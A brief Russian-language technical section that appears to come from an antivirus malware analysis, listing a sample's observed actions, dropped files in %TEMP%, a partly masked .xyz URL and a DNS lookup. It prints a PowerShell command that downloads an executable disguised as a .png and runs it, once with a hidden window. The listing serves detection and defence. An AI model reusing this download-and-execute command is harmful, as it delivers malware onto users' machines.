Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.ct##y.xyz/jam/soapebu.png','%TEMP%\soapebu.exe');%TEMP%\soapebu.exe
- %TEMP%\trbatehtqevyaw.sct
- %TEMP%\1.exe
- http://www.ct##y.xyz/jam/soapebu.png
- DNS ASK ct##y.xyz
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.ct##y.xyz/jam/soapebu.png','%TEMP%\soapebu.exe');%TEMP%\soapebu.exe' (со скрытым окном)